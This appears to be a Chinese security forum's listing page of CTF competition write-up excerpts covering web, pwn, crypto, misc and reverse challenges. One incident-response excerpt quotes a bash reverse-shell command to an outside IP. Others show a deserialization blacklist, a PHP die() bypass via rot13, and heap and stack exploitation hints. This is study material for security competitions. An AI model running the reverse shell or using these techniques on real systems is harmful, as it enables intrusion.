2024 强网拟态决赛web 部分wp

turn 出网打法 有个文件上传接口,可以在线解压。 yaml反序列化,固定反序列化/opt/resources下的文件。 黑名单: {"ScriptEngineManager", "URLClassLoader", "!!", "ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationConte

· 263浏览 · 2024-12-01 06:49
某省移动竞赛决赛个人赛 部分wp

Misc Welcome 欢迎参加竞赛,这是你的 flag:flag{84c4b350-acba-11ef-b9e0-8f6a9a54e088} flag 直接送 黑神话:悟空 png 改宽高,PuzzleSolver秒了 数据库 010 打开,发现里面全是 base64 内容,直接搜索 ZhxhZ(flag{base64 值),解密得到 flag 勒索演练 集团为了提高员工安全意识,决定

· 183浏览 · 2024-11-30 15:13
2024“中华武数杯” 全国网络攻防精英赛

场景2 弱密码登录 开始是一个jumpserver后台登录尝试弱密码admin/admin123进入 注意不要爆破不然会被禁止30分钟 后门账户 在用户管理页面找到管理用户,发现有两个其中一个是后门账户 黑客后门程序 查看进程和对应端口 ps -aux 找到进程执行反弹shell命令 bash -c bash -i >& /dev/tcp/181.32.44.99/9898

· 225浏览 · 2024-11-30 11:10
2024河南省第六届“金盾信安杯”网络与数据安全大赛 线上挑战赛re&misc&crypto

babyre 32位无壳 能明显的看出来有tea特征,在上方可以看出是将flag分了两段分别加密 开启动态调试分析 sub_801100函数是一个伪反调试,无需理会 sub_801130则将flag前半段用十六进制存储,并且表示为小端序 调到这里发现了smc反调试,在调试过程中会改变代码,key相继经过加密,得到了新的key 第二段加密是一个类凯撒,小端序的一个每四字节倒转 改一下库存t

· 338浏览 · 2024-11-30 10:55
2024 金盾杯 wp

fillllll_put 这个题主要考察死亡die 网上有很多种方法可以绕过,这里用的是rot13 <?php die();经过 rot13 编码会变成 <?cuc qrv(); ?>,如果 php 未开启短标签,则不会认识这段代码,也就不会执行。所以就可以绕过了 <?php highlight_file(__FILE__); $filename=$_GET['filena

· 301浏览 · 2024-11-30 10:13
2024 武数杯 RHG

RHG-WP rhg3 设计的知识点:栈上的单字节溢出/劫持放回地址 ssize_t sub_946() { char buf[104]; // [esp+0h] [ebp-68h] BYREF puts("this is no gift"); puts("please input what you want say"); return read(0, buf, 0x6Du);

· 294浏览 · 2024-12-02 08:17
2024古剑山Pwn方向全部题解

in 题目逻辑非常简单 同时题目保护全开,一眼看到有个任意地址写3字节,所以第一个思路是先leak出libcbase.没有任何输出函数,显然这里需要打stdout来泄露,而且发现下面两处read意图很明显,显然是先修改magic为0xfbad1887,然后再让base低字节为\x00,这样就可以泄露出libcbase 后面一个任意地址写3字节,看到main最后有个exit,显然是要打

· 174浏览 · 2024-11-30 07:48
江苏移动“建材赋能”线下个人决赛crypto三道0解题

ez_Eulers_theorem from Crypto.Util.number import getStrongPrime, bytes_to_long from gmpy2 import powmod flag=b'flag{uaioijdioaiodjwioiajdi}' p = getStrongPrime(512) q = getStrongPrime(512) r = getStr

· 134浏览 · 2024-11-30 06:12
2024古剑山 pwn 详解

2024古剑山 pwn 详解 in 解题思路 sla(b"Size:\n",str(0x5e6611)) sla(b"Size:\n",str(0x220000)) 首先申请size超过0x400000的chunk,然后记录size4,然后申请一个超过topchunk的堆块,2.23下申请超过topchunk的堆块会开辟一段空间 然后这两个索引配合,就可以找到stdout结构体 然后直接申请

· 220浏览 · 2024-11-30 05:52
2024 古剑山web&pwn&re&misc wp

un 打开题目环境 观察url的参数,猜测可以存在文件读取漏洞 尝试读取index.php 读取成功 <?php error_reporting(0); class pop { public $aaa; public static $bbb = false; public function __wakeup() { // PHP 5

· 181浏览 · 2024-11-30 05:06
2024NewStarCTF Week5 Pwn方向复现

C_or_CPP 题目中的漏洞比较明显 第一个是case2中的函数中printf("C String: %s\n", buf);这里可以带出libcbase 第二个是case5中的函数,使用 cin 输入了字符串,再将它 memcpy 到 dest 字符串中,而 dest 是存放在栈上的,因此存在栈溢出 from pwnlib.util.packing import u64 from pw

· 123浏览 · 2024-11-28 08:51
第七届浙江省大学生网络与信息安全竞赛决赛 Misc方向全解

第七届浙江省大学生网络与信息安全竞赛决赛 Misc方向全解 FinalSign 给了一个txt,全选可以很明显看到存在空白字符 考虑SNOW隐写(snow特征,有大量的20,09) SNOW.EXE -C FinalSign.txt 得到xorkey:helloworld,那么很明显2c243f2f3b3114345d0a0909333f06100143023b2c55020912就是密文

· 154浏览 · 2024-11-28 06:51
网鼎杯玄武 crypto 0:解析变形的 Shamir 密钥分享机制

网鼎杯玄武 crypto 0:解析变形的 Shamir 密钥分享机制 题目概述 本题围绕一个基于 Shamir 密钥分享的加密方案展开,涉及自定义的ShamirSS类和ShamirProtocol类。通过特定的input_share方法将flag分割成大量份额并保存为.sobj文件,其中n_players与flag长度相关,threshold设置为len(flag) * 2,模数p为 257,份额

· 152浏览 · 2024-11-28 05:53
2024网鼎杯 crypto(青龙朱雀白虎) wp

网鼎杯-青龙组 crypto1 题目 # coding: utf-8 #!/usr/bin/env python2 import gmpy2 import random import binascii from hashlib import sha256 from sympy import nextprime from Crypto.Cipher import AES from Crypto.U

· 253浏览 · 2024-11-27 13:27
Newstar Week5 WEB详细解析全

ez_redis 考了个 Redis 命令执⾏以及其历史漏洞 在这里其实给出了示例,结合题目不难发现就是个 Redis 语法 如果你有信息收集意识的话还会发现有源码泄露,访问 /www.zip 即可 关键点在: php <?php if(isset($_POST['eval'])){ $cmd = $_POST['eval']; if(preg_match("/set|p

· 167浏览 · 2024-11-27 07:11